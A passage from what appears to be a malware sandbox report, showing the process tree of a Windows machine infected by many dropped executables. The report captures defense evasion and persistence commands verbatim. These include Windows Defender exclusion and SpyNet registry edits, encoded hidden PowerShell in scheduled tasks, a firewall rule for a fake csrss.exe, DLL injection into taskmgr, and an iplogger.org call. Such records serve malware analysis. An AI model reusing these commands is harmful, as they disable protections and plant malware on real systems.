IAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAIAAtAEEAbABsAG8AdwBTAHQAYQByAHQASQBmAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABpAHMAYQBsAGwAbwB3AEgAYQByAGQAVABlAHIAbQBpAG4AYQB0AGUAIAAtAEQAbwBuAHQAUwB0AG8AcABJAGYARwBvAGkAbgBnAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABvAG4AdABTAHQAbwBwAE8AbgBJAGQAbABlAEUAbgBkACAALQBFAHgAZQBjAHUAdABpAG8AbgBUAGkAbQBlAEwAaQBtAGkAdAAgACgATgBlAHcALQBUAGkAbQBlAFMAcABhAG4AIAAtAEQAYQB5AHMAIAAxADAAMAAwACkAKQAgADwAIwB2AHUAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwAgAC0AVQBzAGUAcgAgACcAUwB5AHMAdABlAG0AJwAgAC0AUgB1AG4ATABlAHYAZQBsACAAJwBIAGkAZwBoAGUAcwB0ACcAIAAtAEYAbwByAGMAZQAgADwAIwBzAHgAYQB6ACMAPgA7ACAAQwBvAHAAeQAtAEkAdABlAG0AIAAnAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAxAC4AZQB4AGUAJwAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwARwBvAG8AZwBsAGUAXABDAGgAcgBvAG0AZQBcAHUAcABkAGEAdABlAHIALgBlAHgAZQAnACAALQBGAG8AcgBjAGUAIAA8ACMAZQBhAG4AdwAjAD4AOwAgAFMAdABhAHIAdAAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAA8ACMAcABhAGsAZAAjAD4AIAAtAFQAYQBzAGsATgBhAG0AZQAgACcARwBvAG8AZwBsAGUAVQBwAGQAYQB0AGUAVABhAHMAawBNAGEAYwBoAGkAbgBlAFEAQwAnADsA"
        6⤵
        
        PID:10728
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://take-realprize.life/?u=lq1pd08&o=hdck0gl
      4⤵
      PID:6428
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa51e146f8,0x7ffa51e14708,0x7ffa51e14718
        5⤵
        
        PID:6528
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,13029288354839587220,14382553859405595438,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:2
        5⤵
        
        PID:8472
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,13029288354839587220,14382553859405595438,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:3
        5⤵
        
        PID:8504
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,13029288354839587220,14382553859405595438,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2644 /prefetch:8
        5⤵
        
        PID:8548
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,13029288354839587220,14382553859405595438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
        5⤵
        
        PID:8940
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,13029288354839587220,14382553859405595438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
        5⤵
        
        PID:8964
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2120,13029288354839587220,14382553859405595438,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4812 /prefetch:8
        5⤵
        
        PID:9268
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,13029288354839587220,14382553859405595438,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4832 /prefetch:1
        5⤵
        
        PID:9536
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,13029288354839587220,14382553859405595438,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3760 /prefetch:1
        5⤵
        
        PID:10156
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,13029288354839587220,14382553859405595438,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3764 /prefetch:1
        5⤵
        
        PID:10232
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2120,13029288354839587220,14382553859405595438,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6072 /prefetch:8
        5⤵
        
        PID:10464
- C:\Users\Admin\Pictures\Adobe Films\p8sYABJEPBKHsrWbuUMvuEmC.exe
  "C:\Users\Admin\Pictures\Adobe Films\p8sYABJEPBKHsrWbuUMvuEmC.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:4564
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2732
- C:\Users\Admin\Pictures\Adobe Films\5aFFSxJwR1FBlcYUjSGidRlz.exe
  "C:\Users\Admin\Pictures\Adobe Films\5aFFSxJwR1FBlcYUjSGidRlz.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2192
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2192 -s 1308
    3⤵
    - Program crash
    PID:3024
- C:\Users\Admin\Pictures\Adobe Films\desuZ_fZh8gKzUyW4uNCIQWO.exe
  "C:\Users\Admin\Pictures\Adobe Films\desuZ_fZh8gKzUyW4uNCIQWO.exe"
  2⤵
  - Executes dropped EXE
  - Checks computer location settings
  - Drops file in Program Files directory
  PID:4576
- - C:\Users\Admin\Documents\AFehaRtS3BjOsH98_ztZ9lt8.exe
    "C:\Users\Admin\Documents\AFehaRtS3BjOsH98_ztZ9lt8.exe"
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    - Executes dropped EXE
    - Checks computer location settings
    PID:123748
  - - C:\Users\Admin\Pictures\Adobe Films\qUSkqDxwv5pK2AljqKezA8_U.exe
      "C:\Users\Admin\Pictures\Adobe Films\qUSkqDxwv5pK2AljqKezA8_U.exe"
      4⤵
      Executes dropped EXE
      PID:178220
  - - C:\Users\Admin\Pictures\Adobe Films\DO8qwv8WmQADZonPHrsQethm.exe
      "C:\Users\Admin\Pictures\Adobe Films\DO8qwv8WmQADZonPHrsQethm.exe"
      4⤵
      Executes dropped EXE
      PID:202264
    - - C:\Users\Admin\AppData\Local\Temp\7zSFB5A.tmp\Install.exe
        
        .\Install.exe
        5⤵
        Executes dropped EXE
        
        PID:252448
      - C:\Users\Admin\AppData\Local\Temp\7zS2C6D.tmp\Install.exe
        
        .\Install.exe /S /site_id "525403"
        6⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks computer location settings
        Drops file in System32 directory
        Enumerates system info in registry
        
        PID:293228
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        7⤵
        
        PID:293744
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        8⤵
        
        PID:1916
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        9⤵
        
        PID:1692
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        9⤵
        
        PID:4764
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        7⤵
        
        PID:556
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        8⤵
        
        PID:832
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        9⤵
        
        PID:1476
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        9⤵
        
        PID:2684
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gZXPOXOvt" /SC once /ST 09:46:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        7⤵
        Creates scheduled task(s)
        
        PID:3036
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gZXPOXOvt"
        7⤵
        
        PID:3752
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "gZXPOXOvt"
        7⤵
        
        PID:5804
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bsAbafpwyZvVmVDlMF" /SC once /ST 14:52:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\BInNSjlobDuvYZgQA\dWABRBnWrovPiXF\wHHkdaf.exe\" Yz /site_id 525403 /S" /V1 /F
        7⤵
        Creates scheduled task(s)
        
        PID:3228
  - - C:\Users\Admin\Pictures\Adobe Films\ntt4u_Lan_6I2ZANObizYNEn.exe
      "C:\Users\Admin\Pictures\Adobe Films\ntt4u_Lan_6I2ZANObizYNEn.exe"
      4⤵
      Executes dropped EXE
      PID:202172
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        5⤵
        
        PID:6928
  - - C:\Users\Admin\Pictures\Adobe Films\cWH8_hZkX3caQW3M5iH8dIBW.exe
      "C:\Users\Admin\Pictures\Adobe Films\cWH8_hZkX3caQW3M5iH8dIBW.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      PID:201084
    - - C:\Windows\SysWOW64\where.exe
        
        where kkskak993jhfkhjskhdfuhuiwyeuiry789q23489yhkjhsdf /?
        5⤵
        
        PID:293716
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c cmd < Calore.sldm & ping -n 5 localhost
        5⤵
        
        PID:480
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd
        6⤵
        
        PID:4048
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist /FI "imagename eq PSUAService.exe"
        7⤵
        Enumerates processes with tasklist
        
        PID:12532
        
        C:\Windows\SysWOW64\find.exe
        
        find /I /N "psuaservice.exe"
        7⤵
        
        PID:12640
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /R "^DSFRIKxgXaTKtMXZByrebjRJrDwrxjAhOWIxSGWRcDMpumUWppHSeWRsqWOyIdTLSGVitCiVojGUmHDEJyUkEHlStdzWSRotKwsm$" Avvenne.sldm
        7⤵
        
        PID:13052
        
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Marito.exe.pif
        
        Marito.exe.pif x
        7⤵
        
        PID:13592
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping localhost -n 5
        7⤵
        Runs ping.exe
        
        PID:13696
  - - C:\Users\Admin\Pictures\Adobe Films\UodlXYKi7I0dvytNXNHpR0KN.exe
      "C:\Users\Admin\Pictures\Adobe Films\UodlXYKi7I0dvytNXNHpR0KN.exe"
      4⤵
      Executes dropped EXE
      PID:201072
    - - C:\Users\Admin\Pictures\Adobe Films\UodlXYKi7I0dvytNXNHpR0KN.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\UodlXYKi7I0dvytNXNHpR0KN.exe"
        5⤵
        
        PID:5956
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        6⤵
        
        PID:6960
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        7⤵
        Modifies Windows Firewall
        
        PID:8336
      - C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        6⤵
        
        PID:9160
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        7⤵
        Creates scheduled task(s)
        
        PID:13224
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        7⤵
        
        PID:13264
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        7⤵
        
        PID:13612
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        7⤵
        Creates scheduled task(s)
        
        PID:1152
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        7⤵
        
        PID:14584
  - - C:\Users\Admin\Pictures\Adobe Films\2bbuEPPB53QlexKI3JihfMai.exe
      "C:\Users\Admin\Pictures\Adobe Films\2bbuEPPB53QlexKI3JihfMai.exe"
      4⤵
      Executes dropped EXE
      PID:201064
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 201064 -s 452
        5⤵
        Program crash
        
        PID:292996
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 201064 -s 764
        5⤵
        Program crash
        
        PID:293536
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 201064 -s 784
        5⤵
        Program crash
        
        PID:292980
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 201064 -s 804
        5⤵
        Program crash
        
        PID:4772
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 201064 -s 812
        5⤵
        Program crash
        
        PID:5060
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 201064 -s 984
        5⤵
        Program crash
        
        PID:2628
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 201064 -s 1016
        5⤵
        Program crash
        
        PID:5356
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 201064 -s 1376
        5⤵
        Program crash
        
        PID:6284
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "2bbuEPPB53QlexKI3JihfMai.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\2bbuEPPB53QlexKI3JihfMai.exe" & exit
        5⤵
        
        PID:6776
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "2bbuEPPB53QlexKI3JihfMai.exe" /f
        6⤵
        Kills process with taskkill
        
        PID:8320
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 201064 -s 1480
        5⤵
        Program crash
        
        PID:6824
  - - C:\Users\Admin\Pictures\Adobe Films\vTzqSbaejF2bhfghwnhyYmFb.exe
      "C:\Users\Admin\Pictures\Adobe Films\vTzqSbaejF2bhfghwnhyYmFb.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      PID:208884
    - - C:\Windows\SysWOW64\where.exe
        
        where kkskak993jhfkhjskhdfuhuiwyeuiry789q23489yhkjhsdf /?
        5⤵
        
        PID:293720
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c cmd < Nell.vst & ping -n 5 localhost
        5⤵
        
        PID:916
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd
        6⤵
        
        PID:2068
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist /FI "imagename eq PSUAService.exe"
        7⤵
        Enumerates processes with tasklist
        
        PID:12556
        
        C:\Windows\SysWOW64\find.exe
        
        find /I /N "psuaservice.exe"
        7⤵
        
        PID:12624
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /R "^fbpXyeUvKokpHuiTLJQCMdBrjOglErOlAahxaNiKQXgzzuRkquHkiUUZVuLsNJRGzwJfSNBYBuMPeoJyXrlbcCrFbgnkwQWuyHZavCajEJJqotWNbFzJnxkRXtRE$" Mia.vst
        7⤵
        
        PID:13104
        
        C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Voglio.exe.pif
        
        Voglio.exe.pif D
        7⤵
        
        PID:13600
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping localhost -n 5
        7⤵
        Runs ping.exe
        
        PID:13684
  - - C:\Users\Admin\Pictures\Adobe Films\IPtG_TrJWml7qL2EfECYeagN.exe
      "C:\Users\Admin\Pictures\Adobe Films\IPtG_TrJWml7qL2EfECYeagN.exe"
      4⤵
      Executes dropped EXE
      PID:208804
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:124872
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:125600
- C:\Users\Admin\Pictures\Adobe Films\2PBNeHhnANFcZLXvOx2BhyvE.exe
  "C:\Users\Admin\Pictures\Adobe Films\2PBNeHhnANFcZLXvOx2BhyvE.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:3444
- - C:\Users\Admin\Pictures\Adobe Films\2PBNeHhnANFcZLXvOx2BhyvE.exe
    "C:\Users\Admin\Pictures\Adobe Films\2PBNeHhnANFcZLXvOx2BhyvE.exe"
    3⤵
    - Executes dropped EXE
    PID:3472
  - - C:\Users\Admin\AppData\Local\Temp\I56K7HK4MBG8EI8.exe
      "C:\Users\Admin\AppData\Local\Temp\I56K7HK4MBG8EI8.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:61844
  - - C:\Users\Admin\AppData\Local\Temp\H7L84LM088BFFC0.exe
      "C:\Users\Admin\AppData\Local\Temp\H7L84LM088BFFC0.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      PID:66812
    - - C:\Users\Admin\AppData\Local\Temp\H7L84LM088BFFC0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H7L84LM088BFFC0.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:73120
  - - C:\Users\Admin\AppData\Local\Temp\MGCBG29JHMLEMCF.exe
      "C:\Users\Admin\AppData\Local\Temp\MGCBG29JHMLEMCF.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      PID:71052
    - - C:\Users\Admin\AppData\Local\Temp\MGCBG29JHMLEMCF.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MGCBG29JHMLEMCF.exe"
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of AdjustPrivilegeToken
        
        PID:75016
  - - C:\Users\Admin\AppData\Local\Temp\L9DHF4E57EM6FKJ.exe
      "C:\Users\Admin\AppData\Local\Temp\L9DHF4E57EM6FKJ.exe"
      4⤵
      Executes dropped EXE
      Checks computer location settings
      Modifies registry class
      PID:77744
    - - C:\Windows\SysWOW64\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\MEf9HB.cpl",
        5⤵
        
        PID:116304
      - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\MEf9HB.cpl",
        6⤵
        Loads dropped DLL
        
        PID:142240
        
        C:\Windows\system32\RunDll32.exe
        
        C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\MEf9HB.cpl",
        7⤵
        
        PID:293248
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\MEf9HB.cpl",
        8⤵
        Loads dropped DLL
        
        PID:293580
  - - C:\Users\Admin\AppData\Local\Temp\3I4KB8HIF4A6FDB.exe
      https://iplogger.org/1x5az7
      4⤵
      Executes dropped EXE
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:86244
- C:\Users\Admin\Pictures\Adobe Films\atNsZViDRuGwwYT8fGWcr69l.exe
  "C:\Users\Admin\Pictures\Adobe Films\atNsZViDRuGwwYT8fGWcr69l.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:5012
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~2.EXE
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~2.EXE
    3⤵
    - Executes dropped EXE
    - Checks computer location settings
    - Suspicious use of AdjustPrivilegeToken
    PID:1824
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA1AA==
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:64212
  - - C:\Users\Admin\AppData\Local\Temp\Ongrthqyalrtzimteamviewerportable_15_32_32.exe
      "C:\Users\Admin\AppData\Local\Temp\Ongrthqyalrtzimteamviewerportable_15_32_32.exe"
      4⤵
      PID:6484
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6484 -s 1692
        5⤵
        Program crash
        
        PID:7028
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
      4⤵
      PID:6664
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
      4⤵
      PID:6680
- C:\Users\Admin\Pictures\Adobe Films\cjTIFcCkRDslD3Fg_jn_oj8q.exe
  "C:\Users\Admin\Pictures\Adobe Films\cjTIFcCkRDslD3Fg_jn_oj8q.exe"
  2⤵
  - Executes dropped EXE
  - Checks computer location settings
  PID:2200
- - C:\Windows\SysWOW64\regsvr32.exe
    "C:\Windows\System32\regsvr32.exe" -u RuORHoB.0 /s
    3⤵
    - Loads dropped DLL
    PID:44896
- C:\Users\Admin\Pictures\Adobe Films\8GtwDL5uIPAGSf5Vw0_vTxoe.exe
  "C:\Users\Admin\Pictures\Adobe Films\8GtwDL5uIPAGSf5Vw0_vTxoe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4084
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4084 -s 1944
    3⤵
    - Program crash
    PID:5160
- C:\Users\Admin\Pictures\Adobe Films\CKthxRkjQ9P0nPCB7pGm4sUU.exe
  "C:\Users\Admin\Pictures\Adobe Films\CKthxRkjQ9P0nPCB7pGm4sUU.exe"
  2⤵
  - Executes dropped EXE
  PID:4152
- C:\Users\Admin\Pictures\Adobe Films\pKZvEDfQM4qhJ9covfP9c0w5.exe
  "C:\Users\Admin\Pictures\Adobe Films\pKZvEDfQM4qhJ9covfP9c0w5.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:932
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
